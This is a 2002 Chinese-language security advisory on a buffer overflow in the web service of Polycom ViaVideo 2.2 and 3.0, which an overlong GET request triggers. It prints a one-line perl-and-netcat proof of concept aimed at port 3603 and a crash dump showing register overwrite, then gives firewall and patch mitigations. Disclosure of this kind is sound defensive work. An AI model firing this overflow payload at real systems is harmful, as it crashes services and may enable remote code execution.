Polycom ViaVideo Web组件超长GET请求远程拒绝服务攻击漏洞
发布日期:2002-10-13
更新日期:2002-10-17
受影响系统:Polycom ViaVideo 3.0
Polycom ViaVideo 2.2
描述:
ViaVideo是一款由Polycom开发和维护的个人视频通信产品,使用ViaVideo,可以使用户面对面进行交流。ViaVideo包含WEB服务组件。
ViaVideo的WEB服务程序不能正确处理超长的GET请求,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击。
由于ViaVideo的WEB服务程序对GET请求边界检查不正确,攻击者可以提交4132个字符的GET请求给WEB服务程序,就会导致WebWEB服务程序产生缓冲区溢出,精心构建提交数据可能导致以WEB进程的权限在系统上执行任意指令。
<*来源:
advisory@prophecy.net.nz (
advisory@prophecy.net.nz)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=103463308030702&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
advisory@prophecy.net.nz 提供了如下测试方法:
perl -e 'print "GET " . "A" x 4132 . " HTTP/1.0\r\n\r\n";' | netcat 10.1.0.1 3603
Error message on host:
OS: Microsoft?Windows 2000(TM) 5.0 Service Pack 3 Build 2195
Version: Release 3.0 26Feb2002 3.0.0.144
ViaVideo.exe caused an EXCEPTION_ACCESS_VIOLATION in module vvws.dll at \
001B:67302ECE, CHttpSocket::ReadHeader()+0226 byte(s), \
H:\PLCMBuilds\ViaVideo\WrkSpc\VVSource\Web\WebServer\HttpSocket.cpp, line 1092+0002 \
byte(s) EAX=41414141 EBX=03D491C4 ECX=03D49190 EDX=00000001 ESI=03D49190
EDI=03D4A1E8 EBP=03B6D3F4 ESP=0586FF1C EIP=67302ECE FLG=00010202
CS=001B DS=0023 SS=0023 ES=0023 FS=0038 GS=0000
001B:67302ECE (0x00000000 0x00000000 0x00000000 0x00000000) vvws.dll, \
CHttpSocket::ReadHeader()+0226 byte(s), \
H:\PLCMBuilds\ViaVideo\WrkSpc\VVSource\Web\WebServer\HttpSocket.cpp, line 1092+0002 \
byte(s)
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 使用防火墙对WEB接口进行正确的配置,限制非法用户访问。
厂商补丁:
Polycom
-------
Polycom提供了一个补丁,从如下地址下载:
http://www.polycom.com/securitycenter浏览次数:2913
严重程度:0(网友投票)